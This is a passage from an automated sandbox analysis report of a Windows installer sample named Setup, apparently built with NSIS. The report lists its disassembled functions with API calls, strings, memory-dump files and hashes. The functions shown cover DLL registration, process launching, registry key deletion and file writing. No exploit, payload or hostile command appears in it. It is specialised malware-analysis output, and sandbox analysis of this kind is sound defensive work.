                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425979,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425979,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425979,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                  Strings
                                                                                                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                  • `G, xrefs: 0040246E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                  • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                  • API String ID: 1033533793-4193110038
                                                                                                                                  • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                  • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                  • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                  • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                  Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                  • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                  • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                  • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                  • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                  • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                  • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                  Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425979,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425979,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425979,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                    • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                    • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                  Strings
                                                                                                                                  • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                  • Exec: command="%s", xrefs: 00402241
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                  • API String ID: 2014279497-3433828417
                                                                                                                                  • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                  • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                  • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                  • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                  Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                  • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                  • String ID: f
                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                  • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                  • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                  • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                  • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                  Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                  • MulDiv.KERNEL32(00020600,00000064,001079F5), ref: 00403295
                                                                                                                                  • wsprintfW.USER32 ref: 004032A5
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                  Strings
                                                                                                                                  • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                  • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                  • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                  • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                  • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                  Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                  • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                  • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                  • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                  • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                  • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                  • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                  Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeGloballstrcpyn
                                                                                                                                  • String ID: 183$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                  • API String ID: 1459762280-1205510115
                                                                                                                                  • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                  • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                  • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                  • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                  Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                  • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                  • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                  • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                  • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                  Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                  • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376005127-0
                                                                                                                                  • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                  • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                  • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                  • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                  Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2568930968-0
                                                                                                                                  • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                  • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                  • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                  • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                  Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
